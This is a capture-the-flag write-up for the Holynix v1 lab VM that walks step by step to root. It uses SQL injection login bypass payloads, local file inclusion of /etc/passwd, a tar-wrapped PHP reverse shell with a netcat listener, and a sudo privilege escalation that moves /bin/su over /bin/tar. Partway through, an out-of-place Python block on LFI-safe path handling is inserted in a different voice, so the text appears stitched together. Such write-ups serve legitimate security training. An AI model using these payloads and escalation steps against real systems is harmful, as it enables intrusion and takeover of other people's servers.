- VM: Holynix: v1
- Goal: acquire root access
- Approach: solve without automated exploitation tools
Network IP address fix
When I start the Holynix virtual machine using VMware Workstation 15 Player, the VM does not obtain an IP address automatically. I did the following to fix this issue:
- Reset the root password
- log in to Holynix as root
- run command: rm /etc/udev/rules.d/70-persistent-net.rules
- reboot Holynix: shutdown -r 0
After doing this, the VM should obtain an IP address correctly. Note: if you would like to keep the original root password, record the root entry in the /etc/shadow file right before changing the root password and put it back after the procedure is completed.
The first step is to locate the IP address of my target:
nmap -n -sn 192.168.172.200-254
nmap -p- -A 192.168.172.213
Only port 80 is open.
Let's check out the website. There are not many pages on it: only the home page and the login page.
Then at the login page, I test for SQL injection and find that the password field is vulnerable, using a single quote (') as the password:
I then log in without a password using the following value as the password:
' or 1 = 1#
Nice. Now I am logged in as user alamo. There are a few links, so I browse around to find more information. The most eye-catching one is the Upload link. It seems I can upload files to the web server. If I can view the page after the upload, it may allow PHP code execution.
I then write a simple file test.php to try:
<?php print "Hello" ?>
But unfortunately, user alamo does not have the privilege to upload files.
Looks like I need to log in as another user to try again. I then log out and use SQL injection again to log in as another user:
' or 1 = 1 and username != 'alamo'#
Good. This time I am logged in as etenenbaum. I then try uploading the test.php file again and succeed. Now I need to find where the file is. Since the feature is called 'Home Directory Uploader', I try ~etenenbaum as the path:
But unfortunately, I receive a Permission denied error when trying to browse to test.php. Not good, but I do not give up yet. The uploader page has a checkbox 'Enable the automatic extraction of gzip archives'. I then make a copy of test.php as test2.php and compress it to test2.php.gz:
I then upload the gzip file instead to see what happens. No luck: while it says the file is uploaded successfully, nothing shows up. It is getting nowhere here, so I move on to check other things.
Let's check out the Security link. This page has a drop-down select menu to pick a policy type and then displays its content. I set up Burp Suite as a proxy to intercept the request and try tampering with a parameter called text_file_name to see if I can perform LFI (local file inclusion). I test it by changing the value to /etc/passwd.
Got it. The password file is shown, so the page is vulnerable to LFI. With the ability to display files, I can check the code of transfer.php, which is responsible for processing the upload. So I use this vulnerability to display the content of transfer.php.
Upon reading the code, there are a couple of things I found about uploading gzip archives:
- The upload content type must be application/gzip. I tested the upload using different browsers; some browsers use the content type application/x-gzip or application/x-tar instead. If the upload doesn't work, use Burp to check and ensure the content type is application/gzip.
- sudo tar xzf is used to extract the files, and then the uploaded file is removed. I used gzip to create the archive, which is why it's not working.
I then go back and use tar to compress the file:
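The Security page serves whatever path text_file_name carries, which is why /etc/passwd comes back. As an added example (not code from the Holynix application), the two ways such a page can resolve that parameter in Python: the unsafe join that lets an absolute or traversing value escape the directory, and a hardened resolver that combines an allowlist with a containment check. The policy directory and the drop-down file names are assumed.

```python
import os

# Assumed policy directory and drop-down entries; the write-up does not show
# the real ones on Holynix, so these are constructed for the example.
POLICY_DIR = "/var/www/html/policies"
ALLOWED_POLICIES = {"acceptable_use.txt", "password_policy.txt", "remote_access.txt"}


def unsafe_policy_path(name, base=POLICY_DIR):
    """Mirror the flaw: the user value is joined onto the directory as-is.

    os.path.join discards `base` when `name` is absolute, so /etc/passwd
    resolves to /etc/passwd, and ../ segments walk out of the directory.
    """
    return os.path.normpath(os.path.join(base, name))


def safe_policy_path(name, base=POLICY_DIR, allowed=ALLOWED_POLICIES):
    """Return the path to serve for text_file_name, or None to refuse it.

    Defence in depth: the value must be a bare file name on the allowlist,
    and the normalised result must still sit inside `base`.
    """
    if not isinstance(name, str) or not name:
        return None
    # Reject anything carrying a directory component, traversal or a NUL byte.
    if os.path.basename(name) != name or "\x00" in name:
        return None
    if name not in allowed:
        return None
    base = os.path.abspath(base)
    candidate = os.path.normpath(os.path.join(base, name))
    # Containment check: the common prefix must be the policy directory itself.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for value in ("password_policy.txt", "/etc/passwd", "../../../../etc/passwd", "transfer.php"):
        print(f"{value!r}: unsafe={unsafe_policy_path(value)} safe={safe_policy_path(value)}")
```

The containment check is the backstop in case the allowlist is later loosened; on a live server, open the returned path only after this function accepts the value.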
tar czf test2.tar.gz test2.php
And try the upload again. This time the file is uploaded and extracted successfully. I browse to the file and the page is shown with the PHP code executed. Great news.
There is a PHP reverse shell in the /usr/share/webshells/php folder. I copy it, modify it to use my Kali box's IP address and port 4444, and then tar it up:
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php
tar czf rshell.tar.gz php-reverse-shell.php
The file is then uploaded to the server successfully.
Now start a Netcat listener on the Kali box:
nc -lp 4444
Then browse to the reverse shell PHP file.
Awesome. Reverse shell obtained as user www-data.
I noticed the upload PHP code was using sudo tar and sudo mv. Running sudo -l confirms that user www-data can run a few sudo commands:
This is enough to obtain root access with the following commands:
sudo mv /bin/tar /bin/tar.org
sudo mv /bin/su /bin/tar
sudo tar
Root access obtained!